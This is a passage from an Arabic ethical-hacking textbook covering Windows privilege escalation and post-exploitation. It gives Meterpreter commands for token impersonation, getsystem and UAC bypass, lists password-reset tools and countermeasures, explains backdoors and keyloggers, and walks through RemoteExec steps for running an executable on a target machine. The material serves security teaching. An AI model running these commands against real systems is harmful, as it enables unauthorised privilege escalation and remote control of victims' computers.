‫‪396‬‬

‫ﻣن ﺧﻼل ‪ Meterpreter‬ﻧﺑدأ ﻋﻣﻠﯾﺔ اﻻﺣﺗﻼل ﻣن ﺧﻼل اﺳﺗﺧدام ‪ incognito‬ﻋن طرﯾﻖ طﺑﺎﻋﺔ اﻻﻣر ‪ use incognito‬ﻓﻲ‬ ‫‪-‬‬
‫ﻗذﯾﻔﺔ ‪ Meterpreter‬ﺛم ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻻﻣر ‪ help‬ﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻹﻣﻛﺎﻧﯾﺎت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ‪ incognito‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻋﻧد طﺑﺎﻋﺔ اﻻﻣر ‪ help‬ﺳوف ﻧﻼﻗﻰ اﻟﻌدﯾد ﻣن اﻟﻣﺳﺎﻋدات وﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﻟﻣﺳﺎﻋدات اﻟﺧﺎﺻﺔ ب ‪ incognito‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫اﻻن ﻧرﯾد اﻟﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن اﻟذﯾن ﻗﺎﻣوا ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺗﺎﺣﯾن ﺣﺎﻟﯾﺎ ﻓﻲ اﻟﻧظﺎم أو ﺗﻣﻛﻧوا ﻣن اﻟوﺻول إﻟﻰ‬ ‫‪-‬‬
‫اﻟﻧظﺎم ﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻷﻣر ‪ list_tokens‬ﻣﻊ اﻟﺧﯾﺎر )‪(-u‬ﻛﺎﻻﺗﻰ‪:‬‬

‫اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﻧﻘوم ﺑﺗﺷﻐﯾل ھﺟوم اﻻﻧﺗﺣﺎل‪ ،‬وذﻟك ﻣن ﺧﻼل ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام ‪ impersonate_token‬ﺛم ﻛﺗﺎﺑﺔ ]اﺳم‬ ‫‪-‬‬
‫اﻟﺣﺳﺎب ﻻﻧﺗﺣﺎل ﺻﻔﺔ[‪:‬‬
‫‪impersonate_token TEBA-293DD90F08\\JANA‬‬

‫‪ -‬إذا أردﻧﺎ اﻟﻧﺟﺎح‪ ،‬ﻓﻧﺣن اﻵن ﻧﺳﺗﺧدم اﻟﻧظﺎم اﻟﺣﺎﻟﻲ ﻛﻣﺳﺗﺧدم آﺧر‪.‬‬
‫اﻟﮭدف ﻣن ھﺟوم اﻻﻧﺗﺣﺎل ھو اﺧﺗﯾﺎر أﻋﻠﻰ ﻣﺳﺗوى ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﻣﻛن‪ ،‬وﯾﻔﺿل ﺷﺧص ﯾرﺗﺑط أﯾﺿﺎ ﻋﺑر اﻟدوﻣﯾن‪ ،‬واﺳﺗﺧدام ﺣﺳﺎﺑﮫ‬
‫ﻟﻣزﯾد ﻣن اﻟﻐوص ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬

‫أﯾﺿﺎ ﯾود طرﯾﻘﺔ أﺧرى ﻟرﻓﻊ اﻟﺻﻼﺣﯾﺎت ﻋن طرﯾﻖ اﻧﺗﺣﺎل اﻟﻣﺳﺗﺧدم ‪ system‬وھو أﯾﺿﺎ ﻣن ﺧﻼل ﻗذﯾﻔﺔ ‪ Meterpreter‬ﻋن طرﯾﻖ‬
‫طﺑﺎﻋﺔ اﻻﻣر ‪ getsystem‬وﯾﻣﻛﻧك أﯾﺿﺎ ﻣﻌرﻓﺔ ﺟﻣﯾﻊ ﺧﯾﺎراﺗﮫ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر ‪ –h‬ﻣﻌﮫ‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗﺣﺎول اﻟوﺻول إﻟﻰ ﺟﮭﺎز وﯾﻧدوز‪ 7‬او اﻹﺻدارات اﻷﻋﻠﻰ‪ ،‬ﯾﺟب ﺗﺷﻐﯾل اﻷﻣر ‪ bypassuac‬ﻗﺑل أن ﺗﺗﻣﻛن ﻣن ﺗﺷﻐﯾل‬
‫اﻷﻣر ‪ .getsystem‬ﺣﯾث ﯾﺳﻣﺢ ﻟك ﺑﺗﺟﺎوز ﺗﺣﻛم ﻣﺎﯾﻛروﺳوﻓت ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم )‪(UAC‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋﻧﮫ ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط‬
‫اﻟﺗﺎﻟﻲ‪http://windows.microsoft.com/en-us/windows7/products/features/user-account-control :‬‬
‫وﯾﺗم ﺗﺷﻐﯾل ھذا ﺑﺎﺳﺗﺧدام اﻷواﻣر ﻛﻣﺎ ﯾﻠﻲ ﻓﻲ ‪:Meterpreter‬‬
‫‪run post/windows/escalate/bypassuac‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


397

Other Privilege Escalation Tools

‫ وﻛﻠﻣﺎت ﻣرور‬Windows administrator ‫ أو اﻻﻟﺗﻔﺎف ﺣول‬،‫ إﻋﺎدة ﺗﻌﯾﯾن‬،‫أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﺗﺳﻣﺢ ﻟك ﺑﺄﻣﺎن وﻛﻔﺎءة إزاﻟﺔ‬
‫ ﻣﻊ ﻣﺳﺎﻋدة‬.‫ وﻻ ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‬،‫ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ﻓﻲ ﺣﺎﻟﺔ ﻓﻘداﻧﮭﺎ أو ﻧﺳﯾﺎﻧﮫ ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‬
‫ ﯾﻣﻛﻧك اﻟﺣﺻول ﺑﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻧﺳﯾﺔ أو اﻟﻐﯾر ﻣﻌروﻓﺔ إﻟﻰ ﻛﻠﻣﺎت‬،‫ﻣن ھذه اﻷدوات‬
‫ وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻋﻠﻰ اﻟﻧﺣو‬.‫ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧدام ھذه اﻷدوات ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر اﻷﺻﻠﯾﺔ ﻟﻠﺿﺣﯾﺔ‬.‫ﻓﺎرﻏﺔ‬
:‫اﻟﺗﺎﻟﻲ‬
Offline NT Password & Registry Editor available at http://pogostick.net
Windows Password Reset Kit available at http://www.reset-windows-password.net
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Elcomsoft System Recovery available at http://www.elcomsoft.com
Trinity Rescue Kit available at http://trinityhome.org
Windows Password Recovery Bootdisk available at http://www.rixler.com
PasswordLastic available at http://www.passwordlastic.com
Stellar Phoenix Password Recovery available at http://www.stellarinfo.com
Windows Password Recovery Personal available at http://www.windows-passwordrecovery.com
Windows Administrator Password Reset available at http://www.systoolsgroup.com

(How to Defend Against Privilege Escalation) ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬

‫أﻓﺿل اﻟطرق اﻟﻣﺿﺎدة ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ھو اﻟﺗﺄﻛد ﻣن أن اﻟﻣﺳﺗﺧدﻣﯾن ﻟدﯾﮭم اﻣﺗﯾﺎزات أﻗل درﺟﺔ ﻣﻣﻛﻧﺔ أو ﻣﺟرد اﻣﺗﯾﺎزات ﻛﺎﻓﯾﺔ‬
‫ أﻧﮫ ﻣن اﻟﻣﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن‬.‫ ﺑﻌض اﻟﻌﯾوب ﻓﻲ اﻛواد اﻟﺑرﻣﺟﺔ ﯾﺳﻣﺢ ﺑﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬،‫ ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن‬.‫ﻻﺳﺗﺧدام اﻟﻧظﺎم ﺑﺷﻛل ﻓﻌﺎل‬
.‫ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز أﻋﻠﻰ ﻣن ﻣﺳؤول‬.‫اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام ﺣﺳﺎب ﻏﯾر إدارﯾﺔ‬
:‫ﺗﺷﻣل اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺿد ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز اﻟﻌﺎم اﻻﺗﻲ‬
.(Restrict the interactive logon privileges) ‫ ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول‬-
.(Run users and applications on the least privileges) ‫ ﺟﻌل اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺷﻐﯾل اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻷﻗل اﻻﻣﺗﯾﺎزات‬-
. (Implement multi-factor authentication and authorization)‫ ﺗﻧﻔﯾذ ﻣﺻﺎدﻗﺔ ﻣﺗﻌددة اﻟﻌواﻣل‬-
.(Run services as unprivileged accounts) ‫ ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻛﺣﺳﺎﺑﺎت ﻣن ﻏﯾر اﻣﺗﯾﺎزات ﻣﺛل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس‬-
(Use encryption technique to protect sensitive data) ‫ اﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﺷﻔﯾر ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ‬-
‫ ﺗﻧﻔﯾذ ﻣﻧﮭﺟﯾﺔ ﻓﺻل اﻣﺗﯾﺎز ﻟﻠﺣد ﻣن ﻧطﺎق أﺧطﺎء اﻟﺑرﻣﺟﺔ‬-
Implement a privilege separation methodology to limit the scope of programming errors and bugs
(Reduce the amount of code that runs with particular privilege)‫ ﺗﻘﻠﯾل ﻛﻣﯾﺔ اﻷﻛواد اﻟﺗﻲ ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻣﻊ اﻣﺗﯾﺎز ﺧﺎص‬-
(Perform debugging using bounds checkers and stress tests) ‫ إﺟراء ﺗﺻﺣﯾﺢ‬-
‫ اﺧﺗﺑﺎر ﻧظﺎم اﻟﺗﺷﻐﯾل واﺧطﺎء اﻛواد اﻟﺗطﺑﯾﻘﺎت واﻟﺧﻠل ﺑدﻗﺔ‬-
Test operating system and application coding errors and bugs thoroughly
(Patch the systems regularly) ‫ ﺗﺻﺣﯾﺢ اﻟﻧظم ﺑﺎﻧﺗظﺎم‬-

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪398‬‬

‫‪Executing Applications 5.5‬‬

‫ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ ،‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻟﺗﻧﻔﯾذ ﺑﻌض اﻷﻛواد ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‬
‫ﻣﻣﺎ ھو ﻣﺳﻣوح ﻟﮭم‪ .‬ﻋن طرﯾﻖ ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ ،‬واﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد‬
‫اﻟﻧظﺎم‪ ،‬وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬واﻟﺗﻘﺎط اﻟﺻور‪ ،‬وﺗﺛﺑﯾت ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول‪ ،‬اﻟﺦ‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ ﺷرح ﻣﻔﺻل ﺣول ﺗﻧﻔﯾذ‬
‫اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪.‬‬

‫‪Executing Applications‬‬

‫ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ "اﻣﺗﻼك" اﻟﻧظﺎم‪ Executing Applications .‬ﯾﺗم ﺑﻌد‬
‫اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺻﻼﺣﯾﺎت إدارﯾﺔ)‪ . (administrative privileges‬اﻟﻣﮭﺎﺟم ﻗد ﯾﺣﺎول ﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺧﺎﺻﺔ ﺑﮫ ﻋن‬
‫ﺑﻌد ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ ‪ Exploit‬أو ﻓﻘدان اﻟﺧﺻوﺻﯾﺔ‪ ،‬اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم‪،‬‬
‫وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬واﻟﺗﻘﺎط ‪ ،screenshot‬ﺗﺛﺑﯾت ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭﻠﺔ اﻟوﺻول‪ ،‬وﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ‬
‫ﯾﻧﻔذ اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪:‬‬

‫‪Backdoors -‬‬
‫ھو ﻋﺑﺎره ﻋن ﺗطﺑﯾﻘﺎت ﻣﺻﻣﻣﺔ ل ‪ deny‬أو ﺗﻌطﯾل اﻟﻌﻣﻠﯾﺔ)‪ ، (disrupt operation‬ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ ‪ Exploit‬أو ﻓﻘدان‬
‫اﻟﺧﺻوﺻﯾﺔ‪ ،‬اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم )ﺳﯾﺗم ﺗﻐطﯾﺗﮫ ﻻﺣﻘﺎ(‪.‬‬
‫‪Crackers -‬‬
‫ھو ﻋﺑﺎره ﻋن ﺟزء ﻣن ﺗطﺑﯾﻖ او ﺗطﺑﯾﻖ ﻣﺻﻣم ﻟﻛﺳر‪/‬ﻛراك اﻷﻛواد وﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪Keyloggers -‬‬
‫ﯾﻣﻛن ھذا أن ﯾﻛون ﺟﮭﺎز )‪ (hardware‬أو ﺗطﺑﯾﻖ )‪ .(software‬ﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن ﻛﺎن اﻟﮭدف ھو ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪Spyware -‬‬
‫ﺑراﻣﺞ اﻟﺗﺟﺳس )‪ (Spy software‬ﯾﻣﻛﻧﮭﺎ اﻟﺗﻘﺎط ﺟزء ﻣن اﻟﺷﺎﺷﺔ )‪ (Capture screenshot‬وإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣوﻗﻊ ﻣﻌﯾن ﯾﺣدده اﻟﮭﺎﻛرز‪.‬‬
‫اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ھدف وھو اﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﻐرض ﻣن ھذا‪ .‬ﺑﻌد اﺳﺗﺧﻼص ﻛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‬
‫ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑﯾت اﻟﻌدﯾد ﻣن ‪ Backdoors‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‬
‫ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪.‬‬

‫‪Executing Applications: RemoteExec‬‬

‫اﻟﻣﺻدر‪http://www.isdecisions.com :‬‬

‫‪ RemoteExec‬ﯾﺳﻣﺢ ﻟك ﺑﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻟﺑراﻣﺞ‪/‬اﻻﺳﻛرﺑﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﺷﺑﻛﺔ‪ .‬ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺣدﯾث أي ﻣن اﻟﻣﻠﻔﺎت‬
‫واﻟﻣﺟﻠدات‪ ،‬وأﯾﺿﺎ ﻧﺳﺧﮭﺎ‪ ،‬وﻛذﻟك ﺣذﻓﮭﺎ ﻋﻠﻰ اﻟﻔور ﻋﻠﻰ أﻧظﻣﺔ اﻟوﯾﻧدوز‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذا ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﻐﯾﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺧﺎﺻﺔ‬
‫ﺑﺎﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ ﻋن ﺑﻌد‪ ،‬وﯾﻣﻛن ﺗﻌطﯾل ﻛﺎﻓﺔ اﻟﺣﺳﺎﺑﺎت اﻟﻣﺣﻠﯾﺔ اﻷﺧرى ﻟﺗﻌزﯾز اﻷﻣن‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﻋﺎدة‬
‫ﺗﺷﻐﯾل‪ ،‬إﯾﻘﺎف‪ ،wake up ،‬و‪ Power off‬ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد‪.‬‬

‫‪ -1‬ﻧﻘوم ﺑﺗﺛﺑﯾت اﻟﺗطﺑﯾﻖ ﻣن ﺧﻼل اﺗﺑﺎع ‪ Wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﮫ اﻟﺗﺛﺑﯾت‪.‬‬


‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪ RemoteExec‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪399‬‬

‫‪ -3‬ﻹﻋداد اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ )‪ (Executing file‬ﯾﺗم ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوق ‪Remote‬‬
‫‪ jobs‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -4‬ﻧﻘوم ﺑﺎﻟﻧﺛر اﻟﻣزدوج ﻓوق ‪ New remote job‬واﻟذي ﯾؤدى اﻟﻰ اﻋداد وﺗﺷﻐﯾل ‪ new remote job‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪400‬‬

‫‪ -5‬ﻓﻲ ﺟزء اﻻﻋداد ‪ New Remote job‬ﯾﻣﻛن رؤﯾﺔ اﻟﻌدﯾد ﻣن اﻟﻣﺟﻣوﻋﺎت واﻟﺗﻲ ﺗﻌﻣل ﻋن ﺑﻌد‪.‬‬
‫‪ -6‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﺳوف ﻧﺧﺗﺎر ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ ‪ File execution‬واﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل أي ﻣن اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﺟﺎھز اﻟﮭدف‬
‫ﻋن ﺑﻌد وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ‪ File execution‬اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -7‬ﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺧﺎﺻﺔ ب ‪ File execution‬ﻋﻧد اﻟﺗﻌﺑﯾر ‪ File‬ﻧﺧﺗﺎر ﻣﻠف ‪ exe‬اﻟذي ﻧرﯾد ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ .‬ﻣن اﻟﻘﺎﺋﻣﺔ‬
‫اﻟﻣﻧﺳدﻟﺔ ﻣن اﻟﺗﻌﺑﯾر ‪ Context‬ﻧﺧﺗﺎر ‪ Interactive‬وأﯾﺿﺎ ﻧﺧﺗﺎر اﻟﺗﻌﺑﯾر ‪.auto‬‬
‫‪ -8‬ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب ‪ filter‬ﻧﺧﺗﺎر ﻋﻠﻰ ﺣﺳب اﻟﻧظﺎم اﻟﮭدف ﻣﺛﻼ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -9‬ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب ‪ Target computers‬ﻧﺧﺗﺎر اﻟﮭدف اﻟذي ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻋﻠﯾﮫ وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق‬
‫‪ Name‬وإدﺧﺎل اﻟﮭدف‪.‬‬

‫‪ -10‬اﻻن ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﺟﻣﯾﻊ اﻻﻋدادات ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪ Lunch‬اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪401‬‬

‫‪Executing Applications: DameWare NT Utilities‬‬

‫اﻟﻣﺻدر‪http://www.dameware.com :‬‬

‫اﻟﺑرﻧﺎﻣﺞ ‪ DameWare NT‬ﯾﺳﻣﺢ ﻟك ﻹدارة اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ‪ ،‬وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن‬
‫ھذا‪ ،‬ﯾﻣﻛﻧك إدارة أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد وإدارة اﻟوﯾﻧدوز‪ .‬أﯾﺿﺎ ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ ﺣل ﻣﺷﺎﻛل اﻟﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺎﺳﺗﺧدام ﺟﮭﺎز اﻟﺗﺣﻛم ﻋن‬
‫ﺑﻌد‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺷﻐﯾل اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد‪ ،‬وأﺧذ ﻟﻘطﺎت )‪ (capture screenshot‬ﻣن ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪،‬‬
‫وﯾﻣﻛﻧﮫ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب ﻟﻠﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺳرﻋﺔ‪ ،‬ﯾﻣﻛﻧﮫ ﻧﺳﺦ وﻛذﻟك ﺣذف اﻟﻣﻠﻔﺎت ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد‪ ،‬وإدارة‬
‫وﯾﻧدوز ‪ ،active directory‬اﻟﺦ‪.‬‬

‫‪Keyloggers‬‬

‫‪ ،Keyloggers‬وﯾﺳﻣﻰ أﯾﺿﺎ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ )‪ (keystroke logging‬وﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ راﺻد ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھو ﻋﺑﺎره ﻋن‬
‫ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك‪ ،‬وﻗد‬
‫ﯾﻛون ﻋﺑﺎره ﻋن اﺟﮭزه أﯾﺿﺎ ﺣﯾث ﯾﻘوم ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ‪،‬‬
